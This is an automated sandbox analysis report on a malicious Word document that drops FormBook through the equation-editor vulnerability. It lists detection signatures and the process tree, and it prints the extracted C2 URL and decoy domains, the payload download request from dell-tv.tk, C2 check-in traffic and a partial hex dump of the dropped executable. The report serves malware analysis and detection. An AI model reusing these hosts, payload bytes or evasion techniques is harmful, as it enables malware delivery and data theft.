Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report P.O-5433ERE.doc

Overview

General Information

Sample Name:P.O-5433ERE.doc
Analysis ID:528734
MD5:17ca06000e92058f0d43259b2683537c
SHA1:db453e5125310d209fe04fb0211677d79d25f3ee
SHA256:3c9280552a4129fdf884414b080c80d5ffc72403079d7a5292e9b09d832ab37d
Tags:doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1516 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2812 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • ashlkyvc7592.exe (PID: 1528 cmdline: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe MD5: D236BB1F86CAEC110ABB20FC2360E25B)
      • ashlkyvc7592.exe (PID: 836 cmdline: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe MD5: D236BB1F86CAEC110ABB20FC2360E25B)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmstp.exe (PID: 2580 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 00263CA2071DC9A6EE577EB356B0D1D9)
            • cmd.exe (PID: 2176 cmdline: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fcusd4.com/op9t/"], "decoy": ["tzjwt261888.com", "top10iecasinos.com", "nurotag.com", "controlparental24.com", "truenettnpasumo1.xyz", "finsits.com", "publicfigure.skin", "natalispharma.com", "brixbol.com", "bal.group", "perfectinteractivemedia.com", "fascialboost.com", "jgcpfb120.com", "grizzlysolutionsllc.net", "wearegardenersusa.com", "rjsarka.com", "shintoku-gsfarm.com", "1oavyx.com", "volunteervabetweenk.com", "tdshawn.com", "bandhancustomer.com", "amyzingskin.com", "sorbetsa.com", "eadbrasil.club", "directnaukri.com", "alltheheads.com", "elbbinandnibble.online", "kaizenswinger.com", "kimberleydawnwallace.com", "zscyyds.xyz", "ecranthermique.com", "mystitched.com", "shophallows.com", "cachondearais.xyz", "flavatdvb.quest", "christendombiblecollege.com", "affordalbehousing.com", "engro-connect.com", "lorticepttoyof2.xyz", "kingslot.bet", "wiseriq.com", "emmaraducanu.tennis", "xn--seebhnegrlitz-pmb9f.com", "perfectstudio.net", "thenewera.icu", "com104940689794.icu", "imaginative-coaching.com", "campdiscount.info", "waggledance.net", "excellglobus.com", "fssqyd.com", "yalesi.net", "aoliutech.com", "replenish.place", "nityammed.com", "stanislauscountyedu.info", "029saxjy.com", "lttcp089.com", "texaszephyr.com", "sloanlakecomedy.com", "axonlang.com", "bhutaan.com", "sevensummitclimbing.com", "wolfenhawk.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.0.ashlkyvc7592.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.0.ashlkyvc7592.exe.400000.8.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.0.ashlkyvc7592.exe.400000.8.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        5.0.ashlkyvc7592.exe.400000.10.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.ashlkyvc7592.exe.400000.10.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 37.0.9.166, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2812, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2812, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, CommandLine: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, NewProcessName: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2812, ProcessCommandLine: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, ProcessId: 1528
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe", CommandLine: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 2580, ProcessCommandLine: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe", ProcessId: 2176

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.fcusd4.com/op9t/"], "decoy": ["tzjwt261888.com", "top10iecasinos.com", "nurotag.com", "controlparental24.com", "truenettnpasumo1.xyz", "finsits.com", "publicfigure.skin", "natalispharma.com", "brixbol.com", "bal.group", "perfectinteractivemedia.com", "fascialboost.com", "jgcpfb120.com", "grizzlysolutionsllc.net", "wearegardenersusa.com", "rjsarka.com", "shintoku-gsfarm.com", "1oavyx.com", "volunteervabetweenk.com", "tdshawn.com", "bandhancustomer.com", "amyzingskin.com", "sorbetsa.com", "eadbrasil.club", "directnaukri.com", "alltheheads.com", "elbbinandnibble.online", "kaizenswinger.com", "kimberleydawnwallace.com", "zscyyds.xyz", "ecranthermique.com", "mystitched.com", "shophallows.com", "cachondearais.xyz", "flavatdvb.quest", "christendombiblecollege.com", "affordalbehousing.com", "engro-connect.com", "lorticepttoyof2.xyz", "kingslot.bet", "wiseriq.com", "emmaraducanu.tennis", "xn--seebhnegrlitz-pmb9f.com", "perfectstudio.net", "thenewera.icu", "com104940689794.icu", "imaginative-coaching.com", "campdiscount.info", "waggledance.net", "excellglobus.com", "fssqyd.com", "yalesi.net", "aoliutech.com", "replenish.place", "nityammed.com", "stanislauscountyedu.info", "029saxjy.com", "lttcp089.com", "texaszephyr.com", "sloanlakecomedy.com", "axonlang.com", "bhutaan.com", "sevensummitclimbing.com", "wolfenhawk.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drStream path '_1699368849/\x1CompObj' : ...........................F....Microsoft Equation
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: ashlkyvc7592.exe, ashlkyvc7592.exe, 00000005.00000003.424164499.00000000007B0000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000003.425110861.0000000000910000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.462140612.0000000000C20000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000003.462746039.0000000001E70000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000003.461709967.00000000004F0000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000002.686830161.0000000002180000.00000040.00000001.sdmp
          Source: Binary string: cmstp.pdb source: ashlkyvc7592.exe, 00000005.00000002.461894500.00000000006D9000.00000004.00000020.sdmp, ashlkyvc7592.exe, 00000005.00000002.461761536.00000000003E0000.00000040.00020000.sdmp
          Source: global trafficDNS query: name: dell-tv.tk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop esi
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 37.0.9.166:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 37.0.9.166:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.texaszephyr.com
          Source: C:\Windows\explorer.exeDomain query: www.bandhancustomer.com
          Source: C:\Windows\explorer.exeDomain query: www.publicfigure.skin
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.184.102 80
          Source: C:\Windows\explorer.exeDomain query: www.volunteervabetweenk.com
          Source: C:\Windows\explorer.exeDomain query: www.1oavyx.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.fcusd4.com/op9t/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: WKD-ASIE WKD-ASIE
          Source: global trafficHTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1Host: www.texaszephyr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1Host: www.publicfigure.skinConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1Host: www.volunteervabetweenk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 37.0.9.166 37.0.9.166
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Nov 2021 17:08:39 GMTContent-Type: application/x-msdownloadContent-Length: 560128Last-Modified: Thu, 25 Nov 2021 01:30:41 GMTConnection: keep-aliveETag: "619ee741-88c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 e5 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 80 08 00 00 0a 00 00 00 00 00 00 16 9f 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 9e 08 00 4f 00 00 00 00 a0 08 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 7f 08 00 00 20 00 00 00 80 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 70 06 00 00 00 a0 08 00 00 08 00 00 00 82 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 8a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 9e 08 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 b8 21 01 00 03 00 00 00 8c 01 00 06 64 6a 02 00 60 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00
          Source: global trafficHTTP traffic detected: GET /ashlyzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dell-tv.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:10:32 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be75c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE 